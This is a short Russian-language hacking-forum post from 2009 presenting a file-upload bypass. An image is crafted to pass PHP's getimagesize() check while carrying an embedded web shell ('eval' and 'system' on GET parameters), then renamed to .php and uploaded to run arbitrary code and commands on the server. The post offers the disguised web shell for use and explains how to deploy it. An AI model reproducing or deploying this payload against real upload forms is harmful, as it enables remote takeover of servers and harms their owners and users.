25.03.2009, 14:31
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
С нами:
9798086
Репутация:
999
|
|
Эксплойт getimagesize()
Сделал интересную "картинку", обходящую функцию getimagesize().
В чём идея?
В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать
PHP код:
<? eval(stripslashes($_GET)); system($_GET); ?>
Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно.
Баг найден Eugen'ом с tem.dp.ua
|
|
|